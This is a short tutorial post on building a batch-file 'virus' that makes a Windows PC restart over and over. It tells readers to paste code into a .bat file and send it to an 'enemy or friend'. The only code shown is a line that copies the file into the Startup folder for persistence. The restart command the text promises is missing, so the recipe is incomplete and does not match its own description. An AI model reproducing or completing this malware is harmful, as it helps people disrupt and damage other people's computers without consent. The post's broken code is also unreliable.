virus that restarted pc again and again

Hey guyz today we will learn to make a very simple and cool but a dangerous virus .
We will make this virus in a notepad with an extension .bat (for eg.virus.bat)
Just copy the below code and paste the code in the notepad with .bat extension.
NOTE-- dont try this on your computer......

move a.bat C:\Docume~1\alluse~1\Startm~1\​Programs\Startup\

Now send this virus to your enemy or your friend and when they will open this
there pc will start getting restarted again and again......
